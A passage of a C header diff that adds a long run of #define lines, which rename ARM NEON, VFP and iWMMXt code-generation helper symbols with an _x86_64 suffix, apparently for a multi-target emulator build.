gen_helper_neon_cgt_s16_x86_64 +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_x86_64 +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_x86_64 +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_x86_64 +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_x86_64 +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_x86_64 +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_x86_64 +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_x86_64 +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_x86_64 +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_x86_64 +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_x86_64 +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_x86_64 +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_x86_64 +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_x86_64 +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_x86_64 +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_x86_64 +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_x86_64 +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_x86_64 +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_x86_64 +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_x86_64 +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_x86_64 +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_x86_64 +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_x86_64 +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_x86_64 +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_x86_64 +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_x86_64 +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_x86_64 +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_x86_64 +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_x86_64 +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_x86_64 +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_x86_64 +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_x86_64 +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_x86_64 +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_x86_64 +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_x86_64 +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_x86_64 +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_x86_64 +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_x86_64 +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_x86_64 +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_x86_64 +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_x86_64 +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_x86_64 +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_x86_64 +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_x86_64 +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_x86_64 +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_x86_64 +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_x86_64 +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_x86_64 +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_x86_64 +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_x86_64 +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_x86_64 +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_x86_64 +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_x86_64 +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_x86_64 +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_x86_64 +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_x86_64 +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_x86_64 +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_x86_64 +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_x86_64 +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_x86_64 +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_x86_64 +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_x86_64 +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_x86_64 +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_x86_64 +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_x86_64 +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_x86_64 +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_x86_64 +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_x86_64 +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_x86_64 +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_x86_64 +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_x86_64 +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_x86_64 +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_x86_64 +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_x86_64 +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_x86_64 +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_x86_64 +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_x86_64 +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_x86_64 +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_x86_64 +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_x86_64 +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_x86_64 +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_x86_64 +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_x86_64 +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_x86_64 +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_x86_64 +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_x86_64 +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_x86_64 +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_x86_64 +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_x86_64 +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_x86_64 +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_x86_64 +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_x86_64 +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_x86_64 +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_x86_64 +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_x86_64 +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_x86_64 +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_x86_64 +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_x86_64 +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_x86_64 +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_x86_64 +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_x86_64 +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_x86_64 +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_x86_64 +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_x86_64 +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_x86_64 +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_x86_64 +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_x86_64 +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_x86_64 +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_x86_64 +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_x86_64 +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_x86_64 +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_x86_64 +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_x86_64 +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_x86_64 +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_x86_64 +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_x86_64 +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_x86_64 +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_x86_64 +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_x86_64 +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_x86_64 +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_x86_64 +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_x86_64 +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_x86_64 +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_x86_64 +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_x86_64 +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_x86_64 +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_x86_64 +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_x86_64 +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_x86_64 +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_x86_64 +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_x86_64 +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_x86_64 +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_x86_64 +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_x86_64 +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_x86_64 +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_x86_64 +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_x86_64 +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_x86_64 +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_x86_64 +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_x86_64 +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_x86_64 +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_x86_64 +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_x86_64 +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_x86_64 +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_x86_64 +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_x86_64 +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_x86_64 +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_x86_64 +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_x86_64 +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_x86_64 +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_x86_64 +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_x86_64 +#define gen_helper_neon_tbl gen_helper_neon_tbl_x86_64 +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_x86_64 +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_x86_64 +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_x86_64 +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_x86_64 +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_x86_64 +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_x86_64 +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_x86_64 +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_x86_64 +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_x86_64 +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_x86_64 +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_x86_64 +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_x86_64 +#define gen_helper_neon_zip16 gen_helper_neon_zip16_x86_64 +#define gen_helper_neon_zip8 gen_helper_neon_zip8_x86_64 +#define gen_helper_pre_hvc gen_helper_pre_hvc_x86_64 +#define gen_helper_pre_smc gen_helper_pre_smc_x86_64 +#define gen_helper_qadd16 gen_helper_qadd16_x86_64 +#define gen_helper_qadd8 gen_helper_qadd8_x86_64 +#define gen_helper_qaddsubx gen_helper_qaddsubx_x86_64 +#define gen_helper_qsub16 gen_helper_qsub16_x86_64 +#define gen_helper_qsub8 gen_helper_qsub8_x86_64 +#define gen_helper_qsubaddx gen_helper_qsubaddx_x86_64 +#define gen_helper_rbit gen_helper_rbit_x86_64 +#define gen_helper_recpe_f32 gen_helper_recpe_f32_x86_64 +#define gen_helper_recpe_u32 gen_helper_recpe_u32_x86_64 +#define gen_helper_recps_f32 gen_helper_recps_f32_x86_64 +#define gen_helper_rintd gen_helper_rintd_x86_64 +#define gen_helper_rintd_exact gen_helper_rintd_exact_x86_64 +#define gen_helper_rints gen_helper_rints_x86_64 +#define gen_helper_rints_exact gen_helper_rints_exact_x86_64 +#define gen_helper_ror_cc gen_helper_ror_cc_x86_64 +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_x86_64 +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_x86_64 +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_x86_64 +#define gen_helper_sadd16 gen_helper_sadd16_x86_64 +#define gen_helper_sadd8 gen_helper_sadd8_x86_64 +#define gen_helper_saddsubx gen_helper_saddsubx_x86_64 +#define gen_helper_sar_cc gen_helper_sar_cc_x86_64 +#define gen_helper_sdiv gen_helper_sdiv_x86_64 +#define gen_helper_sel_flags gen_helper_sel_flags_x86_64 +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_x86_64 +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_x86_64 +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_x86_64 +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_x86_64 +#define gen_helper_set_rmode gen_helper_set_rmode_x86_64 +#define gen_helper_set_user_reg gen_helper_set_user_reg_x86_64 +#define gen_helper_shadd16 gen_helper_shadd16_x86_64 +#define gen_helper_shadd8 gen_helper_shadd8_x86_64 +#define gen_helper_shaddsubx gen_helper_shaddsubx_x86_64 +#define gen_helper_shl_cc gen_helper_shl_cc_x86_64 +#define gen_helper_shr_cc gen_helper_shr_cc_x86_64 +#define gen_helper_shsub16 gen_helper_shsub16_x86_64 +#define gen_helper_shsub8 gen_helper_shsub8_x86_64 +#define gen_helper_shsubaddx gen_helper_shsubaddx_x86_64 +#define gen_helper_ssat gen_helper_ssat_x86_64 +#define gen_helper_ssat16 gen_helper_ssat16_x86_64 +#define gen_helper_ssub16 gen_helper_ssub16_x86_64 +#define gen_helper_ssub8 gen_helper_ssub8_x86_64 +#define gen_helper_ssubaddx gen_helper_ssubaddx_x86_64 +#define gen_helper_sub_saturate gen_helper_sub_saturate_x86_64 +#define gen_helper_sxtb16 gen_helper_sxtb16_x86_64 +#define gen_helper_uadd16 gen_helper_uadd16_x86_64 +#define gen_helper_uadd8 gen_helper_uadd8_x86_64 +#define gen_helper_uaddsubx gen_helper_uaddsubx_x86_64 +#define gen_helper_udiv gen_helper_udiv_x86_64 +#define gen_helper_uhadd16 gen_helper_uhadd16_x86_64 +#define gen_helper_uhadd8 gen_helper_uhadd8_x86_64 +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_x86_64 +#define gen_helper_uhsub16 gen_helper_uhsub16_x86_64 +#define gen_helper_uhsub8 gen_helper_uhsub8_x86_64 +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_x86_64 +#define gen_helper_uqadd16 gen_helper_uqadd16_x86_64 +#define gen_helper_uqadd8 gen_helper_uqadd8_x86_64 +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_x86_64 +#define gen_helper_uqsub16 gen_helper_uqsub16_x86_64 +#define gen_helper_uqsub8 gen_helper_uqsub8_x86_64 +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_x86_64 +#define gen_helper_usad8 gen_helper_usad8_x86_64 +#define gen_helper_usat gen_helper_usat_x86_64 +#define gen_helper_usat16 gen_helper_usat16_x86_64 +#define gen_helper_usub16 gen_helper_usub16_x86_64 +#define gen_helper_usub8 gen_helper_usub8_x86_64 +#define gen_helper_usubaddx gen_helper_usubaddx_x86_64 +#define gen_helper_uxtb16 gen_helper_uxtb16_x86_64 +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_x86_64 +#define gen_helper_v7m_msr gen_helper_v7m_msr_x86_64 +#define gen_helper_vfp_absd gen_helper_vfp_absd_x86_64 +#define gen_helper_vfp_abss gen_helper_vfp_abss_x86_64 +#define gen_helper_vfp_addd gen_helper_vfp_addd_x86_64 +#define gen_helper_vfp_adds gen_helper_vfp_adds_x86_64 +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_x86_64 +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_x86_64 +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_x86_64 +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_x86_64 +#define gen_helper_vfp_divd gen_helper_vfp_divd_x86_64 +#define gen_helper_vfp_divs gen_helper_vfp_divs_x86_64 +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_x86_64 +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_x86_64 +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_x86_64 +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_x86_64 +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_x86_64 +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_x86_64 +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_x86_64 +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_x86_64 +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_x86_64 +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_x86_64 +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_x86_64 +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_x86_64 +#define gen_helper_vfp_mins gen_helper_vfp_mins_x86_64 +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_x86_64 +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_x86_64 +#define gen_helper_vfp_muld gen_helper_vfp_muld_x86_64 +#define gen_helper_vfp_muls gen_helper_vfp_muls_x86_64 +#define gen_helper_vfp_negd gen_helper_vfp_negd_x86_64 +#define gen_helper_vfp_negs gen_helper_vfp_negs_x86_64 +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_x86_64 +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_x86_64 +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_x86_64 +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_x86_64 +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_x86_64 +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_x86_64 +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_x86_64 +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_x86_64 +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_x86_64 +#define gen_helper_vfp_subd gen_helper_vfp_subd_x86_64 +#define gen_helper_vfp_subs gen_helper_vfp_subs_x86_64 +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_x86_64 +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_x86_64 +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_x86_64 +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_x86_64 +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_x86_64 +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_x86_64 +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_x86_64 +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_x86_64 +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_x86_64 +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_x86_64 +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_x86_64 +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_x86_64 +#define gen_helper_vfp_touid gen_helper_vfp_touid_x86_64 +#define gen_helper_vfp_touis gen_helper_vfp_touis_x86_64 +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_x86_64 +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_x86_64 +#define gen_helper_vfp_tould gen_helper_vfp_tould_x86_64 +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_x86_64 +#define gen_helper_vfp_touls gen_helper_vfp_touls_x86_64 +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_x86_64 +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_x86_64 +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_x86_64 +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_x86_64 +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_x86_64 +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_x86_64 +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_x86_64 +#define gen_helper_wfe gen_helper_wfe_x86_64 +#define gen_helper_wfi gen_helper_wfi_x86_64 +#define gen_hvc gen_hvc_x86_64 +#define gen_intermediate_code_internal gen_intermediate_code_internal_x86_64 +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_x86_64 +#define gen_iwmmxt_address gen_iwmmxt_address_x86_64 +#define gen_iwmmxt_shift gen_iwmmxt_shift_x86_64 +#define gen_jmp gen_jmp_x86_64 +#define gen_load_and_replicate gen_load_and_replicate_x86_64 +#define gen_load_exclusive gen_load_exclusive_x86_64 +#define gen_logic_CC gen_logic_CC_x86_64 +#define gen_logicq_cc gen_logicq_cc_x86_64 +#define gen_lookup_tb gen_lookup_tb_x86_64 +#define gen_mov_F0_vreg gen_mov_F0_vreg_x86_64 +#define gen_mov_F1_vreg gen_mov_F1_vreg_x86_64 +#define gen_mov_vreg_F0 gen_mov_vreg_F0_x86_64 +#define gen_muls_i64_i32 gen_muls_i64_i32_x86_64 +#define gen_mulu_i64_i32 gen_mulu_i64_i32_x86_64 +#define gen_mulxy gen_mulxy_x86_64 +#define gen_neon_add gen_neon_add_x86_64 +#define gen_neon_addl gen_neon_addl_x86_64 +#define gen_neon_addl_saturate gen_neon_addl_saturate_x86_64 +#define gen_neon_bsl gen_neon_bsl_x86_64 +#define gen_neon_dup_high16 gen_neon_dup_high16_x86_64 +#define gen_neon_dup_low16 gen_neon_dup_low16_x86_64 +#define gen_neon_dup_u8 gen_neon_dup_u8_x86_64 +#define gen_neon_mull gen_neon_mull_x86_64 +#define gen_neon_narrow gen_neon_narrow_x86_64 +#define gen_neon_narrow_op gen_neon_narrow_op_x86_64 +#define gen_neon_narrow_sats gen_neon_narrow_sats_x86_64 +#define gen_neon_narrow_satu gen_neon_narrow_satu_x86_64 +#define gen_neon_negl gen_neon_negl_x86_64 +#define gen_neon_rsb gen_neon_rsb_x86_64 +#define gen_neon_shift_narrow gen_neon_shift_narrow_x86_64 +#define gen_neon_subl gen_neon_subl_x86_64 +#define gen_neon_trn_u16 gen_neon_trn_u16_x86_64 +#define gen_neon_trn_u8 gen_neon_trn_u8_x86_64 +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_x86_64 +#define gen_neon_unzip gen_neon_unzip_x86_64 +#define gen_neon_widen gen_neon_widen_x86_64 +#define gen_neon_zip gen_neon_zip_x86_64 +#define gen_new_label gen_new_label_x86_64 +#define gen_nop_hint gen_nop_hint_x86_64 +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_x86_64 +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_x86_64 +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_x86_64 +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_x86_64 +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_x86_64 +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_x86_64 +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_x86_64 +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_x86_64 +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_x86_64 +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_x86_64 +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_x86_64 +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_x86_64 +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_x86_64 +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_x86_64 +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_x86_64 +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_x86_64 +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_x86_64 +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_x86_64 +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_x86_64 +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_x86_64 +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_x86_64 +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_x86_64 +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_x86_64 +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_x86_64 +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_x86_64 +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_x86_64 +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_x86_64 +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_x86_64 +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_x86_64 +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_x86_64 +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_x86_64 +#define gen_op_iwmmxt_mulshw_M0_wRn 